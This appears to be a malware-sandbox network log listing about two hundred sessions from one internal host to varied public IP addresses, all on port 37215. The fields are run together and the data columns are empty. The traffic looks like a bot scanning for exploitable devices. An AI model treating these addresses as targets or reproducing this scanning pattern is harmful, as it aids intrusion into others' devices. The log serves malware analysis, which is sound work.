                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3434192.168.2.133544041.232.85.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3435192.168.2.1346680197.84.202.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3436192.168.2.1336380157.229.200.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3437192.168.2.1354550197.2.75.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3438192.168.2.1351026203.151.98.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3439192.168.2.1356258147.49.237.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3440192.168.2.1335970157.237.247.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3441192.168.2.133348841.12.163.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3442192.168.2.1357270197.205.233.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3443192.168.2.1354136197.200.220.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3444192.168.2.135179041.29.176.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3445192.168.2.1353566210.99.220.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3446192.168.2.135721441.118.220.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3447192.168.2.1351582197.86.61.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3448192.168.2.1344960126.92.122.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3449192.168.2.1336076157.200.160.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3450192.168.2.1347672157.66.246.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3451192.168.2.135059041.226.37.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3452192.168.2.135965841.114.50.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3453192.168.2.1347114112.60.227.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3454192.168.2.1351578197.19.71.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3455192.168.2.135084041.49.138.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3456192.168.2.1332886157.19.208.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3457192.168.2.1352036157.191.121.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3458192.168.2.1359830197.76.206.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3459192.168.2.1339102157.209.169.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3460192.168.2.135295041.29.85.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3461192.168.2.134393284.225.110.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3462192.168.2.1340178197.75.13.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3463192.168.2.135639441.36.191.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3464192.168.2.1337258157.222.101.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3465192.168.2.1353598157.227.138.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3466192.168.2.1332826197.53.92.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3467192.168.2.135541041.238.64.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3468192.168.2.1341362197.212.239.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3469192.168.2.1355524157.151.0.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3470192.168.2.135546862.199.27.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3471192.168.2.134181650.114.28.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3472192.168.2.134657241.223.198.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3473192.168.2.1344356209.222.17.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3474192.168.2.1350988157.139.214.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3475192.168.2.1339628157.59.55.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3476192.168.2.1360998197.73.141.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3477192.168.2.1334436213.106.212.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3478192.168.2.133883041.112.79.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3479192.168.2.135699441.145.192.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3480192.168.2.1348226157.252.48.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3481192.168.2.1358426102.100.133.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3482192.168.2.133340241.101.132.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3483192.168.2.1347646114.48.199.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3484192.168.2.1338870197.14.7.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3485192.168.2.1339722112.150.180.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3486192.168.2.1358168197.154.89.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3487192.168.2.1344994173.123.130.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3488192.168.2.1360664157.67.34.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3489192.168.2.1343204157.183.213.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3490192.168.2.1344696197.98.183.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3491192.168.2.133653241.88.202.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3492192.168.2.135702841.83.251.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3493192.168.2.1354356183.125.247.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3494192.168.2.1345870197.180.138.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3495192.168.2.1353902203.197.166.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3496192.168.2.135900041.238.22.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3497192.168.2.1347266157.61.22.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3498192.168.2.1334540157.187.64.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3499192.168.2.1350284157.216.251.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3500192.168.2.134631084.61.99.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3501192.168.2.1355698157.73.75.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3502192.168.2.1351612157.125.87.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3503192.168.2.1339660197.73.67.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3504192.168.2.133676241.185.117.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3505192.168.2.1341710157.35.106.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3506192.168.2.1334140157.222.108.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3507192.168.2.1340744197.6.74.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3508192.168.2.1351418157.2.31.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3509192.168.2.1351830208.187.199.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3510192.168.2.135873041.99.133.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3511192.168.2.1351714182.9.111.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3512192.168.2.135048441.162.209.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3513192.168.2.1335220197.225.11.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3514192.168.2.1348634157.139.34.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3515192.168.2.1355326107.46.235.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3516192.168.2.135288449.47.93.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3517192.168.2.1357342170.156.187.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3518192.168.2.135119241.218.223.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3519192.168.2.1357986197.203.120.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3520192.168.2.135150041.254.71.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3521192.168.2.1359148157.188.32.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3522192.168.2.1355982110.17.248.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3523192.168.2.1335528197.150.175.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3524192.168.2.133573687.14.20.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3525192.168.2.1337580197.126.119.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3526192.168.2.1345676197.119.75.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3527192.168.2.134485441.3.33.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3528192.168.2.133432641.149.65.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3529192.168.2.133744441.167.166.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3530192.168.2.134780441.225.9.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3531192.168.2.1350504197.20.218.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3532192.168.2.134229674.161.161.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3533192.168.2.1352292157.184.93.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3534192.168.2.1348100157.147.61.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3535192.168.2.1342100157.25.139.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3536192.168.2.1349198108.117.236.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3537192.168.2.135684641.196.84.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3538192.168.2.133522041.228.253.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3539192.168.2.134162041.86.209.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3540192.168.2.133396297.148.119.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3541192.168.2.134770241.238.245.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3542192.168.2.1333228157.17.7.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3543192.168.2.1336756157.166.147.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3544192.168.2.1334044198.130.91.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3545192.168.2.135872698.82.238.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3546192.168.2.135489641.1.58.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3547192.168.2.135802841.178.142.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3548192.168.2.133604241.111.51.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3549192.168.2.13419969.184.183.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3550192.168.2.1354728197.4.146.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3551192.168.2.135118641.110.255.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3552192.168.2.1347108197.38.224.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3553192.168.2.1345834197.250.160.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3554192.168.2.1360194197.181.154.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3555192.168.2.1336218197.165.202.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3556192.168.2.1359786197.122.28.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3557192.168.2.1349866197.107.93.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3558192.168.2.1345294101.157.128.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3559192.168.2.1356000197.89.0.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3560192.168.2.1348670179.191.151.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3561192.168.2.136063892.102.58.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3562192.168.2.1343780157.57.246.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3563192.168.2.1356160157.93.171.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3564192.168.2.134941288.39.227.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3565192.168.2.1339476182.246.186.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3566192.168.2.1351730157.39.195.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3567192.168.2.133324441.38.212.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3568192.168.2.1359028157.230.210.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3569192.168.2.133504041.74.203.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3570192.168.2.1349242197.68.64.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3571192.168.2.1340358197.108.23.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3572192.168.2.134501041.224.32.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3573192.168.2.134115241.236.118.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3574192.168.2.1336292197.160.104.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3575192.168.2.1338626197.4.79.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3576192.168.2.1334142197.252.188.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3577192.168.2.1357230157.129.129.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3578192.168.2.134951679.91.225.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3579192.168.2.1343244153.197.231.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3580192.168.2.133594441.196.77.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3581192.168.2.134540641.230.226.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3582192.168.2.1336230197.214.34.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3583192.168.2.135569441.197.182.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3584192.168.2.1354954157.168.152.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3585192.168.2.1357520157.139.51.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3586192.168.2.1345102157.34.162.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3587192.168.2.134072632.169.42.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3588192.168.2.1338520197.249.79.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3589192.168.2.1354112217.83.42.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3590192.168.2.1333476157.213.41.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3591192.168.2.135840641.132.17.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3592192.168.2.134083241.109.133.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3593192.168.2.134679241.181.56.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3594192.168.2.1360608157.13.71.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3595192.168.2.134936241.169.209.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3596192.168.2.1350880157.192.44.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3597192.168.2.135590291.245.54.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3598192.168.2.1357456150.242.188.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3599192.168.2.1342040197.110.14.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3600192.168.2.1335808197.35.65.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3601192.168.2.1343882197.158.152.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3602192.168.2.1337714157.240.45.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3603192.168.2.1338264157.250.155.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3604192.168.2.134509641.21.165.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3605192.168.2.1357722197.152.100.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3606192.168.2.1346516201.29.253.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3607192.168.2.1342998178.151.151.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3608192.168.2.133584241.115.209.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3609192.168.2.1335682197.187.240.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3610192.168.2.1335956197.195.154.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3611192.168.2.1336052197.46.63.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3612192.168.2.134793841.243.89.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3613192.168.2.1353992157.206.52.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3614192.168.2.1340082157.154.81.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3615192.168.2.1360226157.99.9.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3616192.168.2.1349342157.233.74.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3617192.168.2.1358736197.218.112.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3618192.168.2.1339670197.46.108.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3619192.168.2.1344240157.243.140.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3620192.168.2.1335462197.61.75.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3621192.168.2.1348570202.115.189.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3622192.168.2.1357320157.245.233.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3623192.168.2.134897241.168.212.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3624192.168.2.135613041.252.152.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3625192.168.2.1357406157.119.241.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3626192.168.2.1344582197.74.87.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3627192.168.2.1341932157.205.126.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3628192.168.2.1345118197.224.79.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3629192.168.2.1335292197.37.12.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3630192.168.2.1340450103.25.188.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3631192.168.2.1354146197.130.48.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3632192.168.2.1340956157.29.46.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3633192.168.2.134648854.155.194.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3634192.168.2.136011841.75.89.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3635192.168.2.1354078197.170.57.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3636192.168.2.1356206137.3.233.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3637192.168.2.1337292197.21.212.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3638192.168.2.1341622157.1.210.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3639192.168.2.1340004197.48.215.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3640192.168.2.133754641.254.70.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3641192.168.2.1345180197.251.21.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3642192.168.2.1351608197.208.222.15437215
                                                  TimestampBytes transferredDirectionData


